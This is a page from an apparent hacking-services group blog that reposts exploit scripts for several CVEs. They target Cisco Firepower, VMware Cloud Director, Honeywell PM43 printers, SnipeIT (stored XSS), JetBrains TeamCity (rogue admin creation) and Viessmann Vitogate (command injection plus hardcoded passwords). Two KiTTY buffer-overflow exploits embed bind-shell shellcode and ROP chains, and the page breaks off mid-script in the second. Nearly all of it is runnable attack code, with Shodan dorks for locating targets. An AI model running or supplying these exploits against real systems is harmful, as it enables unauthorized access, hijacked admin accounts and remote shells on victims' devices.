Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863109792

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: [Cisco Firepower Management Center]
# Google Dork: [non]
# Date: [12/06/2023]
# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)
# Version: [6.2.3.18", "6.4.0.16", "6.6.7.1]
# CVE : [CVE-2023-20048]

import requests
import json

# set the variables for the URL, username, and password for the FMC web services interface
fmc_url = "https://fmc.example.com"
fmc_user = "admin"
fmc_pass = "cisco123"

# create a requests session to handle cookies and certificate verification
session = requests.Session()
session.verify = False

# send a POST request to the /api/fmc_platform/v1/auth/generatetoken endpoint to get the access token and refresh token
token_url = fmc_url + "/api/fmc_platform/v1/auth/generatetoken"
response = session.post(token_url, auth=(fmc_user, fmc_pass))

# check the response status and extract the access token and refresh token from the response headers
# set the access token as the authorization header for the subsequent requests
try:
    if response.status_code == 200:
        access_token = response.headers["X-auth-access-token"]
        refresh_token = response.headers["X-auth-refresh-token"]
        session.headers["Authorization"] = access_token
    else:
        print("Failed to get tokens, status code: " + str(response.status_code))
        exit()
except Exception as e:
    print(e)
    exit()

# set the variable for the domain id
# change this to your domain id
domain_id = "e276abec-e0f2-11e3-8169-6d9ed49b625f"

# send a GET request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords endpoint to get the list of devices managed by FMC
devices_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords"
response = session.get(devices_url)

# check the response status and extract the data as a json object
try:
    if response.status_code == 200:
        data = response.json()
    else:
        print("Failed to get devices, status code: " + str(response.status_code))
        exit()
except Exception as e:
    print(e)
    exit()

# parse the data to get the list of device names and URLs
devices = []
for item in data["items"]:
    device_name = item["name"]
    device_url = item["links"]["self"]
    devices.append((device_name, device_url))

# loop through the list of devices and send a GET request to the URL of each device to get the device details
for device in devices:
    device_name, device_url = device
    response = session.get(device_url)

    # check the response status and extract the data as a json object
    try:
        if response.status_code == 200:
            data = response.json()
        else:
            print("Failed to get device details, status code: " + str(response.status_code))
            continue
    except Exception as e:
        print(e)
        continue

    # parse the data to get the device type, software version, and configuration URL
    device_type = data["type"]
    device_version = data["metadata"]["softwareVersion"]
    config_url = data["metadata"]["configURL"]

    # check if the device type is FTD and the software version is vulnerable to the CVE-2023-20048 vulnerability
    # use the values from the affected products section in the security advisory
    if device_type == "FTD" and device_version in ["6.2.3.18", "6.4.0.16", "6.6.7.1"]:
        print("Device " + device_name + " is vulnerable to CVE-2023-20048")

        # create a list of commands that you want to execute on the device
        commands = ["show version", "show running-config", "show interfaces"]
        device_id = device_url.split("/")[-1]

        # loop through the list of commands and send a POST request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords/{DEVICE_ID}/operational/command/{COMMAND} endpoint to execute each command on the device
        # replace {DOMAIN_UUID} with your domain id, {DEVICE_ID} with your device id, and {COMMAND} with the command you want to execute
        for command in commands:
            command_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords/" + device_id + "/operational/command/" + command
            response = session.post(command_url)

            # check the response status and extract the data as a json object
            try:
                if response.status_code == 200:
                    data = response.json()
                else:
                    print("Failed to execute command, status code: " + str(response.status_code))
                    continue
            except Exception as e:
                print(e)
                continue

            # parse the data to get the result of the command execution and print it
            result = data["result"]
            print("Command: " + command)
            print("Result: " + result)

    else:
        print("Device " + device_name + " is not vulnerable to CVE-2023-20048")
HireHackking 
# Exploit Title: [VMware Cloud Director | Bypass identity verification]
# Google Dork: [non]
# Date: [12/06/2023]
# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)
# Version: [10.5]
# CVE : [CVE-2023-34060]
import requests
import paramiko
import subprocess
import socket
import argparse
import threading

# Define a function to check if a port is open
def is_port_open(ip, port):
    # Create a socket object
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Set the timeout to 1 second
    s.settimeout(1)
    # Try to connect to the port
    try:
        s.connect((ip, port))
        # The port is open
        return True
    except:
        # The port is closed
        return False
    finally:
        # Close the socket
        s.close()

# Define a function to exploit a vulnerable device
def exploit_device(ip, port, username, password, command):
    # Create a ssh client object
    client = paramiko.SSHClient()
    # Set the policy to accept any host key
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    # Connect to the target using the credentials
    client.connect(ip, port, "root", "vmware", allow_agent=False, look_for_keys=False)
    # Execute the command and get the output
    stdin, stdout, stderr = client.exec_command(command)
    # Print the output
    print(f"The output of the command {command} on the device {ip}:{port} is: {stdout.read().decode()}")
    # Close the ssh connection
    client.close()


# Parse the arguments from the user
parser = argparse.ArgumentParser(description="A Python program to detect and exploit the CVE-2023-34060 vulnerability in VMware Cloud Director")
parser.add_argument("ip", help="The target IP address")
parser.add_argument("-p", "--ports", nargs="+", type=int, default=[22, 5480], help="The target ports to check")
parser.add_argument("-u", "--username", default="root", help="The username for ssh")
parser.add_argument("-w", "--password", default="vmware", help="The password for ssh")
parser.add_argument("-c", "--command", default="hostname", help="The command to execute on the vulnerable devices")
args = parser.parse_args()

# Loop through the ports and check for the vulnerability
for port in args.ports:
    # Check if the port is open
    if is_port_open(args.ip, port):
        # The port is open, send a GET request to the port and check the status code
        response = requests.get(f"http://{args.ip}:{port}")
        if response.status_code == 200:
            # The port is open and vulnerable
            print(f"Port {port} is vulnerable to CVE-2023-34060")
            # Create a thread to exploit the device
            thread = threading.Thread(target=exploit_device, args=(args.ip, port, args.username, args.password, args.command))
            # Start the thread
            thread.start()
        else:
            # The port is open but not vulnerable
            print(f"Port {port} is not vulnerable to CVE-2023-34060")
    else:
        # The port is closed
        print(f"Port {port} is closed")
HireHackking 
#- Exploit Title: Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)
#- Shodan Dork: http.title:PM43 , PM43
#- Exploit Author: ByteHunter
#- Email: 0xByteHunter@proton.me
#- Frimware Version: versions prior to P10.19.050004
#- Tested on: P10.17.019667
#- CVE : CVE-2023-3710


import requests
import argparse

BLUE = '\033[94m'
YELLOW = '\033[93m'
RESET = '\033[0m'

def banner():
    banner = """
    ╔════════════════════════════════════════════════╗
        CVE-2023-3710   
        Command Injection in Honeywell PM43 Printers
        Author: ByteHunter      
    ╚════════════════════════════════════════════════╝
    """
    print(YELLOW + banner + RESET)


def run_command(url, command):
    full_url = f"{url}/loadfile.lp?pageid=Configure"
    payload = {
        'username': f'hunt\n{command}\n',
        'userpassword': 'admin12345admin!!'
    }
    try:
        response = requests.post(full_url, data=payload, verify=False)
        response_text = response.text
        html_start_index = response_text.find('<html>')
        if html_start_index != -1:
            return response_text[:html_start_index]
        else:
            return response_text  
    except requests.exceptions.RequestException as e:
        return f"Error: {e}"

def main():
    parser = argparse.ArgumentParser(description='Command Injection PoC for Honeywell PM43 Printers')
    parser.add_argument('--url', dest='url', help='Target URL', required=True)
    parser.add_argument('--run', dest='command', help='Command to execute', required=True)

    args = parser.parse_args()

    response = run_command(args.url, args.command)
    print(f"{BLUE}{response}{RESET}")

if __name__ == "__main__":
    banner()
    main()
HireHackking 
Exploit Title: SnipeIT 6.2.1 - Stored Cross Site Scripting
Date: 06-Oct-2023
Exploit Author: Shahzaib Ali Khan
Vendor Homepage: https://snipeitapp.com
Software Link: https://github.com/snipe/snipe-it/releases/tag/v6.2.1
Version: 6.2.1
Tested on: Windows 11 22H2 and Ubuntu 20.04
CVE: CVE-2023-5452

Description: SnipeIT 6.2.1 is affected by a stored cross-site scripting
(XSS) feature that allows attackers to execute JavaScript commands. The
location endpoint was vulnerable.

Steps to Reproduce:

1. Login as a standard user [non-admin] > Asset page > List All
2. Click to open any asset > Edit Asset
3. Create new location and add the payload:
<script>alert(document.cookie)</script>
4. Now login to any other non-admin or admin > Asset page > List All
5. Open the same asset of which you can change the location and the payload
will get executed.

POC Request:

POST /api/v1/locations HTTP/1.1
Host: localhost
Content-Length: 118
Accept: */*
X-CSRF-TOKEN: CDJkvGNWzFKFueeNx0AQMJIhhXJGZmKG1SFeVEGV
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Referer: http://localhost/hardware/196/edit
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: snipeit_session=AHw3ARN6pdg90xU4ovG1FBZywycKPLIxjTUfmELO;
assetsListingTable.bs.table.cardView=false; laravel_token=
eyJpdiI6IitpM1RXVEVEVGNLZzRTd28wYmhZblE9PSIsInZhbHVlIjoickJocmNYTzNOS3JYdkdhSmpJME1GRmJYMi9DUnVkaStDTzBnbHZDVG1xNVAvbTA5cjJHM1FTbi95SEVzNmNnNzdKNHY5em5pK3
ZjQ2F3VnB6RnhJRCs4NkV6NW16RnRWb3M0cXBuT2ZpZExoQ3JrN1VIVHB3cWV5NUtBRWZ4OXBsdEx4R0hSeElLV1BEbWk2WGxiWEBOMDg5cGFySj1rSnENckx3bXg2Qi9KQzFvNGJJTktjTVUw0EI4YVNM
d2UxdW1TelBDV1ByUk9yeTFOUDR1cS9SV2tFRi9LOG1iZGVweUxJdGhHTXRLSnFvTU82QVIvREphS215bkRtKzM5M1RVQ21nVENsT1M1Mn1FUT1TbFkOVDVPbHd4a3BFQW1YQkY3NFR2bzRQSGZIelppa0
01MGYvSmFrbXVGWHpV0FMiLCJtYWMi0iJjZjMwMmQ4ZTB1NmM4MDU5YzU4MTYzZTgxNTcx0WEwYmM2Y2EyMmRlYzZhMmE2ZjI1NzIxYjc4NmIxNjRiOWM5IiwidGFnIjoiIn0%3D;
XSRF-TOKEN=
eyJpdiI6IjNmMVpNUEpDNCtpV0pHKOczZDRSUmc9PSIsInZhbHVlIjoiWXYvZkY2bTk4MONsUUFZQjZiVWtPdm1JRE1WWmpBd2tsZWNJblgxZWg3dONYL2x0Zkxib3N5Y1N5YmRYVm1XUm91N3pES1F1bH
FWMEV1Y2xsZ1VqZ1FYdmdYcjJRZXZMZG9NYmpWY2htL2tPdXNBQUdEbjVHSEVjV2tzKOpYelEiLCJtYWMi0iI1YzhkNmQ2NDAxNmZkYTQ1NzVhZmI5OGY3ODA3MDkOOTc4ZWVhYmMiZWIYMjZhZGZiZWI5
MjMOMGJjZDBkNzU4IiwidGFnIjoiIn0%3D
Connection: close

name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&city=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&country=



Thanks,
Shahzaib Ali Khan
HireHackking

JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE)

HACKER · %s · %s

#- Exploit Title: JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE) #- Shodan Dork: http.title:TeamCity , http.favicon.hash:-1944119648 #- Exploit Author: ByteHunter #- Vendor: JetBrains #- Email: 0xByteHunter@proton.me #- vendor: JetBrains #- Version: versions before 2023.05.4 #- Tested on: 2023.05.3 #- CVE : CVE-2023-42793 import requests import argparse import re import random import string import subprocess banner = """ ===================================================== * CVE-2023-42793 * * TeamCity Admin Account Creation * * * * Author: ByteHunter * ===================================================== """ print(banner) parser = argparse.ArgumentParser(description="CVE-2023-42793 - TeamCity JetBrains PoC") parser.add_argument("-u", "--url", required=True, help="Target URL") parser.add_argument("-v", "--verbose", action="store_true", help="verbose mode") args = parser.parse_args() url = args.url if url.startswith("https://"): curl_command = "curl -k" else: curl_command = "curl" get_token_url = f"{url}/app/rest/users/id:1/tokens/RPC2" delete_token_url = f"{url}/app/rest/users/id:1/tokens/RPC2" create_user_url = f"{url}/app/rest/users" create_user_command = "" token = "" response = requests.post(get_token_url, verify=False) if response.status_code == 200: match = re.search(r'value="([^"]+)"', response.text) if match: token = match.group(1) print(f"Token: {token}") else: print("Token not found in the response") elif response.status_code == 404: print("Token already exists") delete_command = f'{curl_command} -X DELETE {delete_token_url}' delete_process = subprocess.Popen(delete_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) delete_process.wait() delete_output = delete_process.communicate() if delete_process.returncode == 0: print("Previous token deleted successfully\nrun this command again for creating new token & admin user.") else: print("Failed to delete the previous token") elif response.status_code == 400: print("Token already exists") delete_command = f'{curl_command} -X DELETE {delete_token_url}' delete_process = subprocess.Popen(delete_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) delete_process.wait() delete_output = delete_process.communicate() if delete_process.returncode == 0: print("Previous token deleted successfully\nrun this command again for creating new token & admin user.") else: print("Failed to delete the previous token") else: print("Failed to get a token") if token: headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } random_chars = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(4)) username = f"city_admin{random_chars}" data = { "username": username, "password": "Main_password!!**", "email": "angry-admin@funnybunny.org", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]} } create_user_command = f'{curl_command} --path-as-is -H "Authorization: Bearer {token}" -X POST {create_user_url} -H "Content-Type: application/json" --data \'{{"username": "{username}", "password": "theSecretPass!", "email": "nest@nest", "roles": {{"role": [{{"roleId": "SYSTEM_ADMIN", "scope": "g"}}]}}}}\'' create_user_response = requests.post(create_user_url, headers=headers, json=data) if create_user_response.status_code == 200: print("Successfully exploited!") print(f"URL: {url}") print(f"Username: {username}") print("Password: Main_password!!**") else: print("Failed to create new admin user") if args.verbose: if response.status_code == 400: pass else: print(f"Final curl command: {create_user_command}")
HireHackking

Viessmann Vitogate 300 2.1.3.0 - Remote Code Execution (RCE)

HACKER · %s · %s

#- Exploit Title: Viessmann Vitogate 300 <= 2.1.3.0 - Remote Code Execution (RCE) #- Shodan Dork: http.title:'Vitogate 300' #- Exploit Author: ByteHunter #- Email: 0xByteHunter@proton.me #- Version: versions up to 2.1.3.0 #- Tested on: 2.1.1.0 #- CVE : CVE-2023-5702 & CVE-2023-5222 import argparse import requests def banner(): banner = """ ╔═══════════════════════════════════╗ CVE-2023-5702 Vitogate 300 RCE Author: ByteHunter ╚═══════════════════════════════════╝ """ print(banner) def send_post_request(target_ip, command, target_port): payload = { "method": "put", "form": "form-4-7", "session": "", "params": { "ipaddr": f"1;{command}" } } headers = { "Host": target_ip, "Content-Length": str(len(str(payload))), "Content-Type": "application/json" } url = f"http://{target_ip}:{target_port}/cgi-bin/vitogate.cgi" response = requests.post(url, json=payload, headers=headers) if response.status_code == 200: print("Result:") print(response.text) else: print(f"Request failed! status code: {response.status_code}") def main(): parser = argparse.ArgumentParser(description="Vitogate 300 RCE & Hardcoded Credentials") parser.add_argument("--target", required=False, help="Target IP address") parser.add_argument("--port", required=False, help="Target port",default="80") parser.add_argument("--command", required=False, help="Command") parser.add_argument("--creds", action="store_true", help="Show hardcoded credentials") args = parser.parse_args() if args.creds: print("Vitogate 300 hardcoded administrative accounts credentials") print("Username: vitomaster, Password: viessmann1917") print("Username: vitogate, Password: viessmann") else: target_ip = args.target target_port = args.port command = args.command if not (target_ip and command): print("Both --target and --command options are required.\nor use --creds option to see hardcoded Credentials.") return send_post_request(target_ip, command,target_port) if __name__ == "__main__": banner() main()
HireHackking
# Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Hostname' Buffer Overflow # Exploit Author: DEFCESCO (Austin A. DeFrancesco) # Vendor Homepage: https://github.com/cyd01/KiTTY/= # Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip # Version: ≤ 0.76.1.13 # Tested on: Microsoft Windows 11/10/8/7/XP # CVE: 2024-25003 #-------------------------------------------------------------------------------------# # Blog: https://blog.DEFCESCO.io/Hell0+KiTTY #-------------------------------------------------------------------------------------# # msf6 payload(windows/shell_bind_tcp) > to_handler # # [*] Payload Handler Started as Job 1 # # msf6 payload(windows/shell_bind_tcp) > # # [*] Started bind TCP handler against 192.168.100.28:4444 # # [*] Command shell session 1 opened (192.168.100.119:39315 -> 192.168.100.28:4444) # #-------------------------------------------------------------------------------------# import sys import os import struct #---------------------------------------------------------------------------------------------# # msf6 payload(windows/shell_bind_tcp) > generate -b '\x00\x07\x0a\x0d\x1b\x9c\x3A\x40' -f py # # windows/shell_bind_tcp - 375 bytes # # https://metasploit.com/ # # Encoder: x86/xor_poly # # VERBOSE=false, LPORT=4444, RHOST=192.168.100.28, # # PrependMigrate=false, EXITFUNC=process, CreateSession=true, # # AutoVerifySession=true # #---------------------------------------------------------------------------------------------# buf = b"" buf += b"\x51\x53\x56\x57\xdb\xd9\xd9\x74\x24\xf4\x5f\x41" buf += b"\x49\x31\xc9\x51\x59\x90\x90\x81\xe9\xae\xff\xff" buf += b"\xff\xbe\xd4\xa1\xc4\xf4\x31\x77\x2b\x83\xef\xfc" buf += b"\x51\x59\x90\xff\xc9\x75\xf3\x5f\x5e\x5b\x59\x28" buf += b"\x49\x46\xf4\xd4\xa1\xa4\x7d\x31\x90\x04\x90\x5f" buf += b"\xf1\xf4\x7f\x86\xad\x4f\xa6\xc0\x2a\xb6\xdc\xdb" buf += b"\x16\x8e\xd2\xe5\x5e\x68\xc8\xb5\xdd\xc6\xd8\xf4" buf += b"\x60\x0b\xf9\xd5\x66\x26\x06\x86\xf6\x4f\xa6\xc4" buf += b"\x2a\x8e\xc8\x5f\xed\xd5\x8c\x37\xe9\xc5\x25\x85" buf += b"\x2a\x9d\xd4\xd5\x72\x4f\xbd\xcc\x42\xfe\xbd\x5f" buf += b"\x95\x4f\xf5\x02\x90\x3b\x58\x15\x6e\xc9\xf5\x13" buf += b"\x99\x24\x81\x22\xa2\xb9\x0c\xef\xdc\xe0\x81\x30" buf += b"\xf9\x4f\xac\xf0\xa0\x17\x92\x5f\xad\x8f\x7f\x8c" buf += b"\xbd\xc5\x27\x5f\xa5\x4f\xf5\x04\x28\x80\xd0\xf0" buf += b"\xfa\x9f\x95\x8d\xfb\x95\x0b\x34\xfe\x9b\xae\x5f" buf += b"\xb3\x2f\x79\x89\xc9\xf7\xc6\xd4\xa1\xac\x83\xa7" buf += b"\x93\x9b\xa0\xbc\xed\xb3\xd2\xd3\x5e\x11\x4c\x44" buf += b"\xa0\xc4\xf4\xfd\x65\x90\xa4\xbc\x88\x44\x9f\xd4" buf += b"\x5e\x11\x9e\xdc\xf8\x94\x16\x29\xe1\x94\xb4\x84" buf += b"\xc9\x2e\xfb\x0b\x41\x3b\x21\x43\xc9\xc6\xf4\xc5" buf += b"\xfd\x4d\x12\xbe\xb1\x92\xa3\xbc\x63\x1f\xc3\xb3" buf += b"\x5e\x11\xa3\xbc\x16\x2d\xcc\x2b\x5e\x11\xa3\xbc" buf += b"\xd5\x28\xcf\x35\x5e\x11\xa3\x43\xc9\xb1\x9a\x99" buf += b"\xc0\x3b\x21\xbc\xc2\xa9\x90\xd4\x28\x27\xa3\x83" buf += b"\xf6\xf5\x02\xbe\xb3\x9d\xa2\x36\x5c\xa2\x33\x90" buf += b"\x85\xf8\xf5\xd5\x2c\x80\xd0\xc4\x67\xc4\xb0\x80" buf += b"\xf1\x92\xa2\x82\xe7\x92\xba\x82\xf7\x97\xa2\xbc" buf += b"\xd8\x08\xcb\x52\x5e\x11\x7d\x34\xef\x92\xb2\x2b" buf += b"\x91\xac\xfc\x53\xbc\xa4\x0b\x01\x1a\x34\x41\x76" buf += b"\xf7\xac\x52\x41\x1c\x59\x0b\x01\x9d\xc2\x88\xde" buf += b"\x21\x3f\x14\xa1\xa4\x7f\xb3\xc7\xd3\xab\x9e\xd4" buf += b"\xf2\x3b\x21" def shellcode(): sc = b'' sc += b'\xBB\x44\x24\x44\x44' # mov ebx,0x44442444 sc += b'\xB8\x44\x44\x44\x44' # mov eax,0x44444444 sc += b'\x29\xD8' # sub eax,ebx sc += b'\x29\xC4' # sub esp,eax sc += buf sc += b'\x90' * (1052-len(sc)) assert len(sc) == 1052 return sc def create_rop_chain(): # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ #[---INFO:gadgets_to_set_esi:---] 0x004c5832, # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe] 0x006424a4, # ptr to &VirtualProtect() [IAT kitty.exe] 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x00484e07, # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe] 0x00473cf6, # XCHG EAX,ESI # RETN [kitty.exe] #[---INFO:gadgets_to_set_ebp:---] 0x00429953, # POP EBP # RETN [kitty.exe] 0x005405b0, # push esp; ret 0 [kitty.exe] #[---INFO:gadgets_to_set_ebx:---] 0x0049d9f9, # POP EBX # RETN [kitty.exe] 0x00000201, # 0x00000201-> ebx #[---INFO:gadgets_to_set_edx:---] 0x00430dce, # POP EDX # RETN [kitty.exe] 0x00000040, # 0x00000040-> edx #[---INFO:gadgets_to_set_ecx:---] 0x005ac58c, # POP ECX # RETN [kitty.exe] 0x004d81d9, # &Writable location [kitty.exe] #[---INFO:gadgets_to_set_edi:---] 0x004fa404, # POP EDI # RETN [kitty.exe] 0x005a2001, # RETN (ROP NOP) [kitty.exe] #[---INFO:gadgets_to_set_eax:---] 0x004cd011, # POP EAX # POP EBX # RETN [kitty.exe] 0x90909090, # nop 0x41414141, # Filler (compensate) #[---INFO:pushad:---] 0x005dfbac, # PUSHAD # RETN [kitty.exe] ] return b''.join(struct.pack('<I', _) for _ in rop_gadgets) rop_chain = create_rop_chain() #----------------------------------------------------------------------------------# # Badchars: \x00\x07\x0a\x0d\x1b\x9c\x3A\x40 # # Return Address Information: 0x0052033c : {pivot 332 / 0x14c} : # # ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN # # ** [kitty.exe] ** | startnull,ascii {PAGE_EXECUTE_READWRITE} # # Shellcode size at ESP: 1052 # #----------------------------------------------------------------------------------# return_address = struct.pack('<I', 0x0052033c) # ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [kitty.exe] ** | startnull,ascii {PAGE_EXECUTE_READWRITE} rop_chain_padding = b'\x90' * 35 nops = b'\x90' * 88 escape_sequence = b'\033]0;__dt:' + shellcode() + return_address escape_sequence += rop_chain_padding + rop_chain escape_sequence += b'\x90' escape_sequence += b"\xE9\x2A\xFA\xFF\xFF" #jmp $eip-1490 escape_sequence += nops + b'\007' stdout = os.fdopen(sys.stdout.fileno(), 'wb') stdout.write(escape_sequence) stdout.flush()
HireHackking
# Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Username' Buffer Overflow # Exploit Author: DEFCESCO (Austin A. DeFrancesco) # Vendor Homepage: https://github.com/cyd01/KiTTY/= # Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip # Version: ≤ 0.76.1.13 # Tested on: Microsoft Windows 11/10/8/7/XP # CVE: CVE-2024-25004 #-------------------------------------------------------------------------------------# # Blog: https://blog.DEFCESCO.io/Hell0+KiTTY #-------------------------------------------------------------------------------------# # msf6 payload(windows/shell_bind_tcp) > to_handler # # [*] Payload Handler Started as Job 1 # # msf6 payload(windows/shell_bind_tcp) > # # [*] Started bind TCP handler against 192.168.100.28:4444 # # [*] Command shell session 1 opened (192.168.100.119:34285 -> 192.168.100.28:4444) # #-------------------------------------------------------------------------------------# import sys import os import struct #-------------------------------------------------------------------------------------# # msf6 payload(windows/shell_bind_tcp) > generate -b '\x00\x07\x0a\x0d\x1b\x9c' -f py # # windows/shell_bind_tcp - 355 bytes # # https://metasploit.com/ # # Encoder: x86/shikata_ga_nai # # VERBOSE=false, LPORT=4444, RHOST=192.168.100.28, # # PrependMigrate=false, EXITFUNC=process, CreateSession=true, # # AutoVerifySession=true # #-------------------------------------------------------------------------------------# buf = b"" buf += b"\xd9\xe9\xd9\x74\x24\xf4\xbd\xfe\xb7\xa4\x99\x5e" buf += b"\x29\xc9\xb1\x53\x83\xee\xfc\x31\x6e\x13\x03\x90" buf += b"\xa4\x46\x6c\x90\x23\x04\x8f\x68\xb4\x69\x19\x8d" buf += b"\x85\xa9\x7d\xc6\xb6\x19\xf5\x8a\x3a\xd1\x5b\x3e" buf += b"\xc8\x97\x73\x31\x79\x1d\xa2\x7c\x7a\x0e\x96\x1f" buf += b"\xf8\x4d\xcb\xff\xc1\x9d\x1e\xfe\x06\xc3\xd3\x52" buf += b"\xde\x8f\x46\x42\x6b\xc5\x5a\xe9\x27\xcb\xda\x0e" buf += b"\xff\xea\xcb\x81\x8b\xb4\xcb\x20\x5f\xcd\x45\x3a" buf += b"\xbc\xe8\x1c\xb1\x76\x86\x9e\x13\x47\x67\x0c\x5a" buf += b"\x67\x9a\x4c\x9b\x40\x45\x3b\xd5\xb2\xf8\x3c\x22" buf += b"\xc8\x26\xc8\xb0\x6a\xac\x6a\x1c\x8a\x61\xec\xd7" buf += b"\x80\xce\x7a\xbf\x84\xd1\xaf\xb4\xb1\x5a\x4e\x1a" buf += b"\x30\x18\x75\xbe\x18\xfa\x14\xe7\xc4\xad\x29\xf7" buf += b"\xa6\x12\x8c\x7c\x4a\x46\xbd\xdf\x03\xab\x8c\xdf" buf += b"\xd3\xa3\x87\xac\xe1\x6c\x3c\x3a\x4a\xe4\x9a\xbd" buf += b"\xad\xdf\x5b\x51\x50\xe0\x9b\x78\x97\xb4\xcb\x12" buf += b"\x3e\xb5\x87\xe2\xbf\x60\x3d\xea\x66\xdb\x20\x17" buf += b"\xd8\x8b\xe4\xb7\xb1\xc1\xea\xe8\xa2\xe9\x20\x81" buf += b"\x4b\x14\xcb\xbc\xd7\x91\x2d\xd4\xf7\xf7\xe6\x40" buf += b"\x3a\x2c\x3f\xf7\x45\x06\x17\x9f\x0e\x40\xa0\xa0" buf += b"\x8e\x46\x86\x36\x05\x85\x12\x27\x1a\x80\x32\x30" buf += b"\x8d\x5e\xd3\x73\x2f\x5e\xfe\xe3\xcc\xcd\x65\xf3" buf += b"\x9b\xed\x31\xa4\xcc\xc0\x4b\x20\xe1\x7b\xe2\x56" buf += b"\xf8\x1a\xcd\xd2\x27\xdf\xd0\xdb\xaa\x5b\xf7\xcb" buf += b"\x72\x63\xb3\xbf\x2a\x32\x6d\x69\x8d\xec\xdf\xc3" buf += b"\x47\x42\xb6\x83\x1e\xa8\x09\xd5\x1e\xe5\xff\x39" buf += b"\xae\x50\x46\x46\x1f\x35\x4e\x3f\x7d\xa5\xb1\xea" buf += b"\xc5\xd5\xfb\xb6\x6c\x7e\xa2\x23\x2d\xe3\x55\x9e" buf += b"\x72\x1a\xd6\x2a\x0b\xd9\xc6\x5f\x0e\xa5\x40\x8c" buf += b"\x62\xb6\x24\xb2\xd1\xb7\x6c" def shellcode(): sc = b'' sc += b'\xBB\x44\x24\x44\x44' # mov ebx,0x44442444 sc += b'\xB8\x44\x44\x44\x44' # mov eax,0x44444444 sc += b'\x29\xD8' # sub eax,ebx sc += b'\x29\xC4' # sub esp,eax sc += buf sc += b'\x90' * (1042-len(sc)) assert len(sc) == 1042 return sc def create_rop_chain(): # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ #[---INFO:gadgets_to_set_esi:---] 0x004c5832, # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe] 0x006424a4, # ptr to &VirtualProtect() [IAT kitty.exe] 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x00484e07, # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe] 0x00473cf6, # XCHG EAX,ESI # RETN [kitty.exe] #[---INFO:gadgets_to_set_ebp:---] 0x00429953, # POP EBP # RETN [kitty.exe] 0x005405b0, # PUSH ESP; RETN 0 [kitty.exe] #[---INFO:gadgets_to_set_ebx:---] 0x0049d9f9, # POP EBX # RETN [kitty.exe] 0x00000201, # 0x00000201-> ebx #[---INFO:gadgets_to_set_edx:---] 0x00430dce, # POP EDX # RETN [kitty.exe] 0x00000040, # 0x00000040-> edx #[---INFO:gadgets_to_set_ecx:---] 0x005ac58c, # POP ECX # RETN [kitty.exe] 0x004d81d9, # &Writable location [kitty.exe] #[---INFO:gadgets_to_set_edi:---] 0x004fa404, # POP EDI # RETN [kitty.exe] 0x005a2001, # RETN (ROP NOP) [kitty.exe] #[---INFO:gadgets_to_set_eax:---] 0x004cd011, # POP EAX # POP EBX # RETN [kitty.exe] 0x90909090, # nop 0x41414141, # Filler (compensate) #[---INFO:pushad:---] 0x005dfbac, # PUSHAD # RETN [kitty.exe] ] return b''.join(struct.pack('<I', _) for _ in rop_gadgets) rop_chain = create_rop_chain() #----------------------------------------------------------------------------------# # Badchars: \x00\x07\x0a\x0d\x1b\x9c\x9d # # Return Address Information: 0x00529720 : {pivot 324 / 0x144} : # # ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN # # ** [kitty.exe] ** | startnull {PAGE_EXECUTE_READWRITE} # # Shellcode size at ESP: 1042 bytes # #----------------------------------------------------------------------------------# return_address = struct.pack('<I', 0x00529720) # ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [kitty.exe] ** | startnull {PAGE_EXECUTE_READWRITE} rop_chain_padding = b'\x90' * 27 nops = b'\x90' * 88 escape_sequence = b'\033]0;__dt:localhost:' + shellcode() + return_address escape_sequence += rop_chain_padding + 